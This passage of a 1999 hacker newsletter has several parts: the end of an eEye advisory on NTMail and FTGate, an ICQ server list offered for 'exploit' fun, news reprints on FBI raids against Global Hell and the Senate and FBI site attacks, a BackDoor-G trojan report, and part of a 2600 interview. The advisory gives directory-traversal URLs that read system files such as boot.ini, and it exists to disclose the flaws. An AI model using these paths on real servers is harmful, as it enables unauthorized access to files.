Same as above basically. http://[server]:8080/../newuser.txt The only
difference is that FTGate doesn't seem to mind if the file has the carriage
returns or not.
---> NTMail
NTMail suffers from the same programming flaw...
http://[server]:8000/../../../../../boot.ini.
There is other server software out there that suffers from these common
holes. An average of 65% of the software we have tested thus far has had
problems with restricting the path that they allow. NTMail as well as the
other two can be run as a service, NTMail does it by default, therefore you
can read files as SYSTEM on most of them.
Fixes
Disable the web interfaces where applicable until the vendors release
patches.
Vendor Status
All vendors have been notified.
Copyright (c) 1999 eEye Digital Security Team
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail alert@eEye.com for
permission.
Disclaimer:
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.
Please send suggestions, updates, and comments to:
eEye Digital Security Team
info@eEye.com
http://www.eEye.com
@HWA
14.0 Fun with ICQ
~~~~~~~~~~~~
Just stumbled across this site in my travels, has some interesting info check
'em out....
From http://home.earthlink.net/~childzplay/comp.html
Although Miribalis says they do not recommend using 99a yet, I've been using
it for about 1 month and haven't had any trouble with it. Some other people I
know have not been so lucky. I guess it is a use at your own risk deal until they
officially release the 99a final version.
If you didn't know, the server that comes as default in v.99a is watched closely
by Miribalis. Therefore, if you want to go on an exploit journey, I would suggest
connecting up to a more stable, and less watched server. Here are some for your
entertainment:
Mirabilis.com 4000,
ICQMirabilis.com 4000,
icq.mirabilis.com 4000,
icq0.mirabilis.com 4000,
icq1.mirabilis.com 4000,
icq2.mirabilis.com 4000,
icq3.mirabilis.com 4000,
icq4.mirabilis.com 4000,
icq5.mirabilis.com 4000,
icq.lmirabilis.com 4000,
38.151.231.40 4000,
38.161.231.4 4000,
38.161.231.40 4000,
38.161.231.41 4000,
38.161.231.44 4000,
38.161.231.45 4000,
38.161.231.49 4000,
38.161.232.40 4000,
38.161.232.44 4000,
38.161.232.45 4000,
104.99.113.49 4000,
105.99.113.49 4000,
202.68.84.41 4000,
204.91.242.25 4000,
204.91.242.35 4000,
204.91.242.44 4000,
204.91.242.112 4000,
204.91.243.90 4000,
204.91.243.113 4000,
204.91.243.115 4000,
207.95.232.2 4000,
208.21.43.40 4000,
208.21.43.50 4000,
208.22.84.41 4000,
208.161.231.40 4000,
208.202.84.11 4000,
208.202.84.21 4000,
208.202.84.41 4000,
208.204.84.41 4000,
208.208.82.41 4000,
208.208.84.41 4000,
208.215.43.40 4000,
208.215.43.41 4000,
208.215.43.50 4000,
208.215.43.50 4000,
208.215.43.77 4000,
208.215.43.90 4000,
208.315.43.50 4000,
209.83.180.44 4000,
209.83.180.45 4000,
209.91.242.25 4000,
209.91.242.35 4000
@HWA
15.0 FBI raids suspected hackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Received: by hackernews (mbox contact) (with Cubic Circle's
cucipop (v1.31 1998/05/13) Thu May 27 15:40:08 1999)
X-From_: [deleted]@hotmail.com Wed May 26 16:20:14 1999
Delivered-To: submit@hackernews.com
Received: from hotmail.com (law2-f208.hotmail.com
[216.32.XXX.XXX])
by hackernews.com (Postfix) with SMTP id A87D4469F for
; Wed, 26 May 1999 16:20:13 -0500 (EST)
Received: (qmail 39781 invoked by uid 0); 26 May 1999 21:23:12
-0000
Message-ID: <1999052621.39780.qmail@hotmail.com>
Received: from 192.116.XXX.XXX by www.hotmail.com with HTTP;
Wed, 26 May 1999 14:23:11 PDT
X-Originating-IP: [192.116.XXX.XXX]
From: "[deleted]" <[deleted]@hotmail.com>
To: submit@hackernews.com
Subject: www.fbi.gov IS DEAD
Date: Wed, 26 May 1999 21:23:11 GMT
Mime-Version: 1.0
Content-type: text/plain; format=flowed;
Return-Path:
Date: 5/26/99 17:23
Received: 5/27/99 16:48
From: [deleted]@hotmail.com
To: submit@hackernews.com
FBI WILL NOT FUCKIN WITH MY FRIENDS FROM GLOBAL HELL (gH)
www.fbi.gov IS DEAD
im the Israeli ghost and yes i am from israel
the fbi will stop hunting hackers
gangsters dont dance we boggy
today is the 25.5.99 israeli time is : 00:22
www.fbi.gov will stay down all day !
the Israeli Ghost
_______________________________________________________________
Get Free Email and Do More On The Web. Visit http:&#
47;/www.msn.com
FBI Raids Suspected Crackers.
contributed by darkscent
It is often difficult to separate the fact from the fiction,
rumors, supposition, and unsubstantiated allegations
that fly around the net when big news breaks. This is
what HNN has been able to verify so far. Yesterday
morning at aprox 6:00 am CST the FBI executed nine
search warrants in Houston, Seattle and various
California locations. HNN believes that some of those
who where raided where iCBM, MostHated, loophole,
Spaceg0at, soulblazer, fryz, vallah and Cl0pz. HNN has
not learned of any arrests that have been made. While
the FBI has not revealed why the search warrants were
executed it is believed to have some relation to the
recent crack of whitehouse.gov. HNN has received no
confirmation of Most Wanted lists or FBI Directives,
rumors of which have been floating around the net.
MSNBC
http://www.msnbc.com/news/273819.asp
In response to the recent raids several other members
of gH (Global Hell) as well as other groups such as Team
spl0it have attacked numerous web sites, (estimates
range from between 40 and 100). The FBI has admitted
to receiving a major Denial of Service attack, and the
US Senate web site was defaced for a few minutes. In
an interview with MSNBC MostHated said "The
retaliation has to stop." HNN received an email from
"Israeli Ghost" claiming responsibility for the FBI DoS
attack. HNN was also able to snag the US Senate web
page defacement before it was restored.
Nando Times
http://www.techserver.com/story/body/0,1634,53692-86005-610419-0,00.html
CNN
http://www.cnn.com/TECH/computing/9905/27/senate.hackers/
C|Net
http://www.news.com/News/Item/0,4,37138,00.html?owv
Israeli Ghost Email
http://www.hackernews.com/orig/ghost.html
HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html
Last week, a gH member Zyklon (Eric Burns), was
indicted in connection with three separate attacks on
Virginia area systems owned by Computer Tech
Services, Issue Dynamics, and Electric Press which
housed the web site of the United States Information
Agency. The Seattle Times has run a biographical piece
on Zyklon. The story has quotes from his classmates
and parents.
Seattle Times
http://www.seattletimes.com/news/local/html98/hack_19990525.html
Zyklon's Indictment
http://www.hackernews.com/orig/zyklon.html
MSNBC:
Feds vs. hackers: The battle widens
FBI and Senate shut down Web sites after a series of attacks;
skirmishes waged with search warrants and Internet sieges
By Brock Meeks, Alan Boyle and Bob Sullivan
MSNBC
May 28 Computer attacks on the FBI and U.S.
Senate Web sites are leading to a broader
criminal investigation into such intrusions,
officials indicated Friday. The latest skirmish
between federal authorities and Web site
attackers began Wednesday with FBI raids on
purported members of a group called gH, or
Global Hell, in at least three states and has
continued with a protest campaign targeting a
wide spectrum of Internet sites.
THE FBI and Senate Web sites remained inaccessible
Friday as a result of the computer attacks. The FBI shut
down its Web site Wednesday after it was swamped by a
denial-of-service attack.
The Senate took its site offline Thursday night after
attackers broke into the public computer server and
replaced the congressional bodys home page with a screed
against the FBI.
The hacked page claimed credit on behalf of a group
known as the Masters of Downloading, or M0D and
denigrated the FBI as well as Global Hell.
The FBI may be all over the other groups like ... gH
and tK. ... M0D make those morons look like a group of
special-ed students! FBI vs. M0D in 99, bring it on! read
the page, which was peppered with ruder comments and
hacker lingo.
The intrusion compromised our Senate Internet Web
site, and as a result the Senate has taken down our Web
page to do some investigation, said Sherry Little, a
spokeswoman for the Senate sergeant-at-arms, who
manages the site.
She said FBI agents were heading up the investigation.
Theyre looking at the criminal aspects of it, she told
MSNBC. Theyre in charge of the investigation, in that
theyre trying to determine where it came from and whether
there was any connection at all to any incidents that theyve
explored in the past.
The Web outage rendered the official home pages of all
100 senators and senatorial committees inaccessible, but
e-mail and other computer services not related to the public
Web site were unaffected, Little said.
System administrators for the FBI and the Senate Web
sites were beefing up site security during the down time
and no one could say exactly when the sites would be
returned to service. Were not expecting this to be a
long-term problem, Little said.
The FBI was continuing its investigation into the attack
on its own Web site, said Dave Miller, a media
representative at the bureaus national office. He confirmed
that this could result in criminal penalties.
Although he declined to provide specifics on the
investigation, Miller told MSNBC that it would be a logical
point that the FBI would look for connections to past
attacks on federal Web sites.
Earlier this month, Global Hell was implicated in
attacks on a variety of U.S. government sites, including sites
for the White House, several Cabinet departments and the
U.S. Information Agency. Last week, Global Hell member
Eric Burns (who also goes by the name Zyklon), was
arrested in connection with three attacks on government
computers.
Members of Global Hell reported that law-enforcement
officials served search warrants early Wednesday in Seattle,
Houston and California.
In Houston, FBI spokesman Rolando Moss told
MSNBC that agents were investigating allegations of
computer intrusions involving a teen-ager who uses the
hacker handle Mosthated. He said the investigation was
continuing and declined further comment.
In telephone conversations with MSNBC, Mosthated
said that his home was raided at about 6 a.m. CT
Wednesday, and that family computer equipment was
confiscated. He said his parents were really mad. ... The
computer had all their financial information and stuff on it.
Mosthateds mother got on the line to read from the FBIs
receipt for the equipment and confirm that she was really
mad.
Mosthated said at least eight other people around the
country had been served with search warrants as part of a
huge hacker crackdown. Four other Houston-area
hackers, three in California and one in Seattle reportedly
received FBI visits. None was arrested, but all had
computer equipment confiscated, he said.
An FBI representative in San Diego said she could not
comment on the investigation because the paperwork was
sealed. Inquiries with the bureaus Seattle office met with a
similar response: Right now there are still things that need
to be decided, one agent told MSNBC on condition of
anonymity.
White House Web site shut down
The bureaus Web site went out of service only hours
after the raids.
According to AntiOnline, a computer security site, an
individual calling himself Israeli Ghost was taking credit for
the attack on the FBIs site.
FBI will not (profanity deleted) with my friends from
Global Hell, the hacker allegedly wrote in an e-mail to
AntiOnline.
Other members of the hacking community, contacted
by MSNBC, said the FBI site was hit by whats called a
denial-of-service attack. In such an attack, the host
computer is not actually controlled by an outsider; rather,
outsiders bombard a Web site with so many simultaneous
hits that it becomes overwhelmed and can no longer
function.
Mosthated said he didnt know who was responsible
for the denial-of-service attack. The FBI did ask some
cursory questions about this months attack on the White
House Web site. He said he was shown printouts of Web
stories about the incident from MSNBC and CNN. But
they didnt really push those questions, Mosthated said.
As the day went on, other Web sites none of which
had any apparent connection to the FBI were defaced.
A correspondent claiming to be a Global Hell member
called Infamous sent an e-mail message to MSNBC
Wednesday night criticizing the FBI and saying he defaced
over 40 web domains today to state my opinion. The
writers identity could not be confirmed, however.
THIS NEEDS TO STOP
The response to the raids has spread through the digital
underground and taken on a life of its own, a spontaneous
act of retaliation that wasnt asked for.
The retaliation has to stop, Mosthated said. All this
... needs to stop. Have you seen all the Web pages that
have been changed in the last hour? Someone told me that
theres been more than a hundred, he said.
This (retaliation) is just going to look worse on the
people that did get raided, said the 18-year-old
Mosthated, who says he stopped hacking last summer to
set up his own security firm.
This impromptu show of support is going to backfire,
he told MSNBC. Everything that gH has done is going to
be put on my shoulders, owing to his position as the
groups founder.
The FBI agents who executed a search warrant on
Mosthated said they were looking for evidence related to
illegal telecom activity, he said, in particular illegally set-up
conference calls. The FBI told me some company lost
$250,000 because of the illegal conference calling activity,
he said.
Mosthated and other sources indicated that the FBI
appeared to be targeting other figures prominent in the
hacker community. AntiOnline published a list of almost 100
computer handles, purportedly taken from directives sent by
the FBI to Internet service providers.
Seattle Times;
Posted at 12:02 p.m. PDT; Tuesday, May 25, 1999
Suspect was star hacker on the
Internet but shy and lonely in real life
by Roberto Sanchez
Seattle Times staff reporter
In the world of computers, he was Zyklon, the
aggressive "cracker" named after a poison gas,
who had the skill to break into the Web sites
of movie studios, universities and even the
Chinese government.
But on the other side of the monitor -
according to federal prosecutors - Zyklon was
really Eric Burns, a lanky, shy, 19-year-old, a
former student at Shorewood High School with few friends,
several run-ins with the law, and an unhealthy obsession with a
woman who didn't know anything about him.
Burns last week was indicted by a federal grand jury in
Alexandria, Va., on three counts of computer intrusion.
Prosecutors say Burns broke into hundreds of Web pages,
altered files and caused thousands of dollars in damage. They say
he often left behind text taunting his victims and professing his
unrequited love for the woman, a former high-school classmate.
Burns lives in Shoreline. But he was indicted in the Washington,
D.C., suburb because that's where the compromised computer
systems are located.
Burns and his parents, Alice and Edward, did not return calls for
comment. His lawyer, Ralph Hurvitz, advised his client not to give
interviews. He said Burns will plead not guilty.
Acquaintances of Burns - who also took classes at Shoreline
Community College last year - describe him as the stereotypical
computer nerd: shy, didn't talk to many people, had few friends
and spent much of his time on the computer.
"He was very smart, one of the smartest kids I know," said David
Thompson, a member of Shorewood's class of 1998. "Eric knew
and knows so much about computers. He's kind of a freak that
way."
Even the woman, whom Burns idolized in practically every Web
site he hacked, said she had never talked to or been personally
approached by Burns.
"I didn't know who he was or what he did," she said.
She said she took one law class with him her senior year of high
school. After that, she began to receive letters from him, then gifts.
Court records say she received a crystal bell and a diamond
necklace, which her family returned.
"Halfway through my senior year, someone called my house and
told me to look up this (Web) address" for some of his
handiwork, the woman said. She never did.
She said she didn't go to the police or seek a restraining order
because Burns didn't seem dangerous.
"He never did anything to threaten me," she said.
A former friend said Burns had a mean side, which he often
expressed in his hacking and "cracking" - the term for breaking
into Web sites.
"He was into it for the power," said Eric Lindvall, a former student
at Shorewood who was a friend of Burns' in 1994. He said he,
Burns and two other students spent much of their free time
together, breaking into computer or phone systems, getting access
to credit-card numbers and phone accounts.
Lindvall said he and Burns actually got caught by FBI agents in
1994 when they used a stolen credit-card number to buy
computer equipment. They were not prosecuted, and he said he
stopped spending time with Burns after that.
Lindvall also said Burns and two other students were arrested in
1996 for allegedly using stolen credit-card numbers to buy
computer gear, then reselling it to stores or individuals. Again,
Burns was not prosecuted, he said..
An affidavit filed by the U.S. Attorney said Burns bragged online
to an acquaintance about getting caught for credit fraud as a
minor. The Shoreline Week, a community newspaper, published a
story Oct. 2, 1996, about three Shoreline teens arrested for credit
fraud.
Whatever popularity Burns lacked in the real word, he made up
for on the Internet. His alleged exploits were regularly featured in
Web sites dedicated to computer hacking. Some people even
admired him; a cracker who defaced the University of
Washington's engineering Web site in April dedicated the deed to
Zyklon.
Zyklon apparently took his name from the gas used by Nazi
Germany to exterminate Jews.
Burns will be arraigned on June 14. If guilty, he faces up to 15
years in prison.
Roberto Sanchez's phone message number is 206-464-8522.
Copyright © 1999 Seattle Times Company
@HWA
15.1 Real life hacker wargames
~~~~~~~~~~~~~~~~~~~~~~~~~
RAIDED HACKERS
by BHZ, Friday 28th May 1999 on 6.32 pm CET
Our new Special Report talks about recent hackers versus Govenment, and FBI
versus hackers relations. White House was hacked, US Senate was hacked but
several hackers have been found. Read the article Real hacker war-games.
Real hacker war-games
Recently hackers became more and more active. US government and Universities
are keep being hacked. Even the official White House site (www.whitehouse.gov) was
hacked, and replaced with anti-Clinton messages and pictures. Government struck.
Eric Burns aka Zyklon, a gH member was caught and indicted on the count of several
break-ins. His name was also mentioned in "greetz" area of hacked White House
site, so he was questioned about it too. Zyklon, 19 year old, could get up to 15 years
of imprisonment. His fellow hackers from gH hacked in revenge several domains
with messages of protest against the Government. MAST3RZ 0F D0WNL0ADING
earlier today hacked the official US Senate site (www.senate.gov), and wrote about
battle against FBI and US government. FBI site (www.fbi.gov) was under big DoS
(denial of service) attack, and the "attacker" mailed HNN about it (read his mail in
HNN Buffer Overflow section).
Today AntiOnline and HNN published more details of hackers raided by FBI 2 days ago.
HNN wrote that :"some of those who where raided where iCBM, MostHated, loophole,
soulblazer, fryz, vallah and Cl0pz". We found out that following hackers were too involved
in this FBI actions:
- Zyklon (he is found and indicted)
- Spacegoat (already found)
- Spade (already found)
- Overfien (still looking for him)
- Rottenboy (still looking for him)
- Hybrid (still looking for him)
- Sketch (still looking for him)
- Lord Omino (still looking for him)
The crew from Channel 12 did a background check on the hackers and their supposed crimes.
- Rottenboy aka PowerDragon is wanted for telecommunications fraud
- Gino Ramano is also wanted for telecommunications fraud
- Lord Omino aka moviesmith is too wanted for telecommunications fraud
- Overfien is suspected in:
1.hacking various subnets for the hacker group GH
2.hacking mit.edu, zapnow.com, wwu.edu, washington.edu
3.cracking into syprnet (governments classified network)
4.leaving 221 computers infilitrated with the words "overfien wuz here"
5.wanted in oregon for western union fraud "$60,000"
6.also possible accounts of forger and theft
- Sketch aka mode is wanted for telecommunications fraud
- Grip aka JF is wanted for hacking
- loophole aka Elaich is also wanted for hacking
- Hybrid is wanted for telecommunications fraud
BHZ
for Help Net Security
http://net-security.org
@HWA
16.0 MOD hacks Senate site
~~~~~~~~~~~~~~~~~~~~~
From http://www.maximumpcmag.com/
05.28.99 11:53
Hackers Add Senate To Victims
Hackers have added the U.S. Senate's main page to their list of owned
web sites in an escalating war between the FBI and "crackers" around
the globe.
Hackers defaced the main page for the Senate late Thursday
leaving the message: "The FBI may be all over the other groupz, like
those gH and tK queerz, cl00bagz gal0re. M0D make th0se m0ronz l00k
like a gr0up of special-ed st00dentz!@# FBI vs. M0D in '99, BR1NG IT
0N FUQRZ! (BTW NIPC IZ ALS0 0WNED)."
Members of the MOD group told security site, Antionline, that they
gained access to another computer on the Senate's network, installed a
sniffer, and swiped the administrators passwords. On Friday, the
Senate's page was still down but a mirror of the hacked site was kept on
Antionline.
On Wednesday, an attack on the FBI's main page spooked the agency
enough to take down its main page. The FBI's page also remained down
Friday morning.
Related Story: FBI Site Attacked
FBI Site Attacked
The latest victim in a skirmish between hackers and the FBI may have been
the brown-shoes own web site.
The FBI's main web page remained offline Thursday afternoon while the Bureau
checked it for security intrusions. The FBI reportedly took the page down
Wednesday after someone attempted to hack it.
The skirmish apparently began Wednesday morning when FBI agents in
the Houston office raided the homes of hackers who allegedly belonged
to a group called "gH." Agents did not arrest anyone but confiscated
computers of numerous people.
According to security news site, antionline.com, the FBI has also directed
numerous ISPs to preserve backup tapes, logs, e-mail, and IRC
conversations for about thirty individuals suspected of being hackers.
Nando Times;
Hackers take down FBI and Senate Internet sites
Copyright © 1999 Nando Media
Copyright © 1999 Associated Press
By TED BRIDIS
WASHINGTON (May 28, 1999 12:04 a.m. EDT http://www.nandotimes.com) - Computer hackers
continued a series of electronic attacks against Internet sites of federal agencies on Thursday, defacing the
Web page for the U.S. Senate before it was taken down.
The Web site for the FBI also remained inaccessible late Thursday, a day after the agency said hackers tried
unsuccessfully to compromise it. It was unclear when the FBI site might be made available again.
"There was an attempt (Wednesday) by unknown persons to unlawfully gain access to the FBI.Gov Web site,"
according to a statement Thursday from the agency. "It was unsuccessful; however, as a precaution, the FBI
shut down the site and is now taking additional steps to further insulate it."
An obscene message left briefly on the Senate's Web site Thursday blamed the attack on what it said was the
FBI's harassment of specific hacker groups, including the group that took credit for breaking into the White
House site earlier this month.
"Who laughs last? ...," the message said, adding that the intent was to send a monition "... to our friends at the
FBI."
Other federal Web sites, including those for the White House and the House of Representatives, appeared to
be operating normally late Thursday.
MSNBC reported that the attacks stemmed from the FBI's executing a search warrant on the home of a
prominent hacker in Houston, Texas.
FBI spokesman Rolando Moss confirmed that agents were investigating allegations of computer intrusions
involving the Houston hacker. The FBI executed four search warrants that remained sealed, Moss said.
Earlier this month, a grand jury in northern Virginia indicted Eric Burns, 19, on three counts of computer
intrusion. Burns is reportedly known on the Internet as "Zyklon" and believed to be a member of the group that
claimed responsibility for the attacks on the White House and the Senate sites.
Federal prosecutors accused Burns of breaking into a computer between August 1998 and January 1999 in
northern Virginia that is used by the U.S. Information Agency.
"Zyklon" was one of a dozen names listed on the hacked version of the White House Web site, which was
altered overnight Sunday for a few minutes before government computers automatically detected the intrusion.
The grand jury also accused Burns of breaking into two other computers, one owned by LaserNet of Fairfax,
Va., and the other by Issue Dynamics Inc. of Washington.
CNN;
Hackers react to FBI
crackdown by invading
Senate Web site
May 27, 1999
Web posted at: 11:04 p.m. EDT (0304 GMT)
WASHINGTON (CNN) --
Computer hackers reacted to an FBI crackdown by launching cyber assaults
Thursday on government Web sites, including the one belonging to the U.S.
Senate.
People calling up the Senate Web site on Thursday were redirected to one
belonging to the hackers. Posted on the site under the hackers' logo was
the question: "Who laughs last?"
The cyber intruders wrote that their Internet invasion of the legislative site
was a way for them to thumb their noses at the FBI.
Federal agents earlier this week executed search warrants on
suspected hackers' homes in Dallas, Houston and other locations. FBI
sources did not specify if anyone was arrested, but said they believe word of
the raids quickly spread in the computer community.
That attempt to crack down on computer hackers preceded a seemingly
coordinated cyber attack that overloaded the FBI's own Web site, forcing
the agency to shut down the site, officials said Thursday.
FBI officials said their site was besieged with computer hits by scores of
computer users who were apparently outraged over the raids.
No virus was planted in the FBI site, but the sheer number of hits overloaded
the system, said FBI spokesman Frank Scafidi, who described the incident as a
"denial of service attack."
He said the system has been shut down temporarily so additional firewalls
can be erected to protect it. It was unclear when the site would be back up.
The FBI's site contains general information about the agency and does not
house sensitive information.
Justice Correspondent Pierre Thomas contributed to this report.
@HWA
17.0 Backdoor-G a new 'backorifice like' trojan and BO2K
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
Back Orifice, NetBus, and now BackDoor-G
contributed by N4vi11Us
Yet another Trojan horse that leaves MS Windows systems wide open has been discovered.
This new backdoor tool is similar to Back Orifice or NetBus. NetBus is now a commercial
shareware product. Back Orifice has undergone a major rewrite and a new version, BO2K,
is expected to be released at this years DefCon hacker convention. Once a a system has
had any one of these programs installed they become wide open to unknown remote users
who have complete control over the system.
MSNBC
ZD Net
From MSNBC; http://www.msnbc.com/news/274094.asp
New Back Orifice-like Trojan found
BackDoor-G allows remote access to victims PC; Trojan
horse arrives as spam with screen saver or game update
By Bob Sullivan
MSNBC
May 27 Security researchers at Network
Associates Inc. say they have found another
Back Orifice-like Trojan Horse hack tool called
BackDoor-G. The Trojan horse arrives in a
users e-mail posing as a screen saver or game
update, but once executed, it turns the victims
PC into an open client. Then, a hacker can
add, delete, move or execute files on the victims
computer at will from anywhere on the Internet.
BACKDOOR-G IS BEING SENT out in spam mail,
according to Sal Viveros, group marketing manager at
Network Associates. The company discovered it
Wednesday.
Updated versions of virus scanning software, including
Network Associates products, will detect BackDoor-G and
clean it from a victims system.
Such remote administration tools started to surface
last year when Back Orifice was released by a group calling
itself the Cult of the Dead Cow. NetBus, another such tool,
has since been developed into a commercial product by its
author. With both programs, a victim is tricked into
executing an e-mail attachment which then opens his PC to
remote connections via the Internet. Once a victim is
infected, a hacker can do anything to a machine that the
victim can included erasing all files or copying all files.
Such tools represent a dangerous blending of what
might once have been considered relatively harmless pranks
by virus writers and hackers, Viveros said
Were seeing these types of malicious code attacks,
which are trying to attack information directly or indirectly,
he said. Now were seeming to blur the lines between
malicious code attacks and [data] vulnerability.
BackDoor-G already has a variant a very similar
Trojan named Armageddon was discovered in France this
morning.
Several Network Associates clients opened the
attachment and exposed their systems, Viveros said. But
when the promised screen saver did not execute, they called
the virus company.
@HWA
18.0 [CNN] A Q&A with Emmanuel Goldstein, editor of 2600 magazine
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I didn't see a date on the following interviews but they appear fairly timeless
so since I just found them I thought i'd share em with you...- Ed
http://www.cnn.com/TECH/specials/hackers/qandas/
Q&A with Emmanuel Goldstein of
2600: The Hacker's Quarterly
(CNN) -- Emmanuel Goldstein is the editor-in-chief
of 2600: The Hacker Quarterly and hosts a weekly
radio program in New York called "Off the Hook."
1. How do you define hacking?
Hacking is, very simply, asking a lot of
questions and refusing to stop asking. This
is why computers are perfect for inquisitive
people -- they don't tell you to shut up
when you keep asking questions or inputting
commands over and over and over. But
hacking doesn't have to confine itself to
computers. Anyone with an inquisitive mind,
a sense of adventure and strong beliefs in
free speech and the right to know most
definitely has a bit of the hacker spirit in
them.
2. Are there legal or appropriate forms of
hacking?
One of the common misconceptions is that
anyone considered a hacker is doing
something illegal. It's a sad commentary on
the state of our society when someone who
is basically seeking knowledge and the truth
is assumed to be up to something nefarious.
Nothing could be further from the truth.
Hackers, in their idealistic naiveté, reveal
the facts that they discover, without
regard for money, corporate secrets or
government coverups. We have nothing to
hide, which is why we're always relatively
open with the things we do -- whether it's
having meetings in a public place or running
a system for everyone to participate in
regardless of background. The fact that we
don't "play the game" of secrets also makes
hackers a tremendous threat in the eyes of
many who want to keep things away from
the public.
Secrets are all well and good, but if the
only thing keeping them a secret is the fact
that you say it's a secret, then it's not
really a very good secret. We suggest using
strong encryption for those really interested
in keeping things out of the hands of
outsiders. It's interesting also that hackers
are the ones who are always pushing strong
encryption -- if we were truly interested in
getting into everyone's personal affairs, it's
unlikely we'd try and show them how to
stay secure. There are, however, entities
who are trying to weaken encryption.
People should look toward them with
concern, as they are the true threat to
privacy.
3. What in your mind is the purpose of
hacking?
To seek knowledge, discover something
new, be the first one to find a particular
weakness in a computer system or the first
to be able to get a certain result from a
program. As mentioned above, this doesn't
have to confine itself to the world of
computers. Anyone who's an adventurer or
explorer of some sort, or any good
investigative journalist, knows the feeling of
wanting to do something nobody has ever
done before or find the answer despite
being told that you can't. One thing that all
of the people involved in these endeavors
seem to share is the feeling from outsiders
that they're wasting their time.
4. Are you a hacker? Why? Or why not?
Absolutely. It's not something you can just
erase from your personality, nor should you
want to. Once you lose the desire to mess
around with things, tweak programs and
systems, or just pursue an answer doggedly
until you get a result, you've lost a very
important part of yourself. It's quite
possible that many "reformed" hackers will
lose that special ingredient as they become
more and more a part of some other entity
that demands their very souls. But for those
who can resist this, or figure out a way to
incorporate "legitimacy" into their hacker
personalities without compromising them,
there are some very interesting and fun
times ahead.
5. What kind of hacking do you do?
My main interest has always been phones
and rarely does a day pass when I don't
experiment in some way with a phone
system, voice mail system, pay phone, or
my own telephone. I've always been
fascinated by the fact that we're only a
few buttons away from virtually anyone on
the planet and I hope that I never lose that
sense of marvel.
One of the most amazing things I ever got
involved in was routing phone calls within
the network itself -- known as blue-boxing.
You can't do that as easily any more, but it
was a real fun way to learn how everything
was connected -- operators, services,
countries, you name it. And in the
not-too-distant past, there were so many
different sounds phones made depending on
where you were calling. Now they tend to
be standardized rings, busies, etc. But the
magic hasn't disappeared, it's just moved on
to new things ... satellite technology, new
phone networks and voice recognition
technologies.
Many times these new technologies are
designed by the very people who were
hacking the old technologies. The result is
usually more security and systems that
know what people will find useful. While I've
spent a great deal of time playing with
phones, I get the same sense of fun from
computer systems and have invested lots of
time exploring the Internet. It would fill a
book to outline all of the hacker potential
that exists out there. And, of course,
there's radio hacking, which predates a lot
of the current technology. It's gotten to
the point where simply listening to a certain
frequency has become a challenge. It's hard
to believe that it's actually turned into a
crime to listen to some of these
non-scrambled radio waves. But this is the
price we pay when people with no
understanding of technology are the ones in
charge of regulating it.
6. How much time do you spend at it a week?
That's like asking how much time you spend
breathing. It's always with you, you do
more of it at certain times, but it's always
something that's going on in your head.
Even when I sleep, I dream from a hacker
perspective.
7. Do you have a certain kind of site or
"target" sites that most attract you?
We don't sit around with a big map and a
list of targets. In fact, we don't even sit
around together. Most hacking is done by
individuals who simply find things by
messing around and making discoveries. We
share that info and others add input. Then
someone tells the press and the
government that we're plotting to move
satellites and all hell breaks loose.
I think most of us tend to be drawn to the
sites and systems that are said to be
impossible to access. This is a normal
human reaction to being challenged. The
very fact that we continue to do this after
so many of us have suffered so greatly
indicates that this is a very strong driving
force. When this finally becomes recognized
as a positive thing, perhaps we'll really be
able to learn from each other.
8. What, in general, do you think attracts
people to hacking?
People have always been attracted to
adventure and exploration. Never before
have you been able to get this without
leaving your house and without regard to
your skin color, religion, sex, or even the
sound of your voice. On the Internet,
everyone is an equal until they prove
themselves to be a moron. And even then,
you can always start over. It's the ability to
go anywhere, talk to anyone, and not
reveal your personal information unless you
choose to -- or don't know enough not to
-- that most attracts people to the hacker
culture, which is slowly becoming the
Internet culture.
We find that many "mainstream" people
share the values of hackers -- the value of
free speech, the power of the individual
against the state or the corporation, and
the overall sense of fun that we embrace.
Look in any movie where an individual is
fighting a huge entity, and who does the
audience without exception identify with?
Even if the character breaks the rules, most
people want him/her to succeed because
the individual is what it's all about.
9. Do you know enough hackers personally to
know what personality traits they share, if
any?
Hackers come from all different backgrounds
and have all kinds of lifestyles. They aren't
the geeks you see on television or the
cyberterrorists you see in Janet Reno news
conferences. They range in age from under
10 to over 70. They exist in all parts of the
world, and one of the most amazing and
inspiring things is to see what happens
when they come together. It's all about
technology, the thrill of discovery, and
sharing information. That supersedes any
personality issues that might be an issue in
other circumstances.
10. Do you think hackers are productive and
serve a useful purpose?
I think hackers are necessary, and the
future of technology and society itself
(freedom, privacy, etc.) hinges on how we
address the issues today that hackers are
very much a part of. This can be the
dawning of a great era. It can also be the
beginning of true hell.
11. What percentage would you say are
destructive as opposed to those in it out of
intellectual curiosity or to test their skills?
This raises several points that I feel
strongly about. For one thing, hacking is
the only field where the media believes
anyone who says they're a hacker. Would
you believe someone who said they were a
cop? Or a doctor? Or an airline pilot? Odds
are they'd have to prove their ability at
some point or say something that obviously
makes some degree of sense. But you can
walk up to any reporter and say you're a
hacker and they will write a story about you
telling the world that you're exactly what
you say you are without any real proof.
So every time a movie like "Hackers" comes
out, 10 million people from AOL send us
e-mail saying they want to be hackers, too,
and suddenly, every 12-year-old with this
sentiment instantly becomes a hacker in the
eyes of the media and hence, the rest of
society. You don't become a hacker by
snapping your fingers. It's not about getting
easy answers or making free phone calls or
logging into someone else's computer.
Hackers "feel" what they do, and it excites
them.
I find that if the people around you think
you're wasting your time but you genuinely
like what you're doing, you're driven by it,
and you're relentless in your pursuit, you
have a good part of a hacker in you. But if
you're mobbed by people who are looking
for free phone calls, software or exploits,
you're just an opportunist, possibly even a
criminal. We already have words for these
people and it adequately defines what they
do. While it's certainly possible to use
hacking ability to commit a crime, once you
do this you cease being a hacker and
commence being a criminal. It's really not a
hard distinction to make.
Now, we have a small but vocal group who
insist on calling anyone they deem
unacceptable in the hacker world a
"cracker." This is an attempt to solve the
problem of the misuse of the word "hacker"
by simply misusing a new word. It's a very
misguided, though well-intentioned, effort.
The main problem is that when you make up
such a word, no further definition is
required. When you label someone with a
word that says they're evil, you never really
